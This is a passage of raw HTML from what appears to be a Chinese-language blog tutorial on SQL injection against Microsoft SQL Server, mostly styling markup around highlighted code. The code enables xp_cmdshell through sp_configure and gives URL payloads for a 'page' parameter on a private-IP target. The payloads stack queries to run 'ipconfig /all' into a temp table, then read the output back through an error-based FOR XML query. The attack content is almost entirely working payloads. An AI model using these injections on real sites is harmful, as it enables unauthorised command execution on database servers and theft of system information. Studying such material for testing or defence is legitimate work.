238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">4</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">5</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">6</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">7</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">8</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">9</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">10</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">11</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">12</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">13</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 701.6px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">EXEC</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">sp</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">_</span>configure&nbsp;<span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;show&nbsp;advanced&nbsp;options&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">,</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">1</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-2" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-3" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">RECONFIGURE</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">EXEC</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">sp</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">_</span>configure&nbsp;<span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;xp_cmdshell&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">,</span><span class="crayon-cn" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 153, 153) !important;">1</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span></div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-4" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-5" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">RECONFIGURE</span>；&nbsp;&nbsp;&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-6" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-7" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-8" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1;create&nbsp;table&nbsp;temp(id&nbsp;int&nbsp;identity(1,1),a&nbsp;varchar(8000));--</span></div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-9" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-10" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-11" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line crayon-striped-line" id="crayon-5c25a60d4f78a996554922-12" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;</div><div class="crayon-line" id="crayon-5c25a60d4f78a996554922-13" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1;insert&nbsp;into&nbsp;temp&nbsp;exec&nbsp;master.dbo.xp_cmdshell&nbsp;&#39;ipconfig&nbsp;/all&#39;;--</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">读取结果：</p><p><span style="letter-spacing: 1px;"></span></p><div id="crayon-5c25a60d4f78f024247356" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><br/><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 723.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f78f024247356-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">http</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-c" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: italic !important; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(153, 153, 153) !important;">//10.101.101.13/?page=1&nbsp;and&nbsp;(select&nbsp;substring((select&nbsp;a&nbsp;from&nbsp;temp&nbsp;for&nbsp;xml&nbsp;auto),1,4000))>0--</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7eu50r7mj21690qo4qp.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 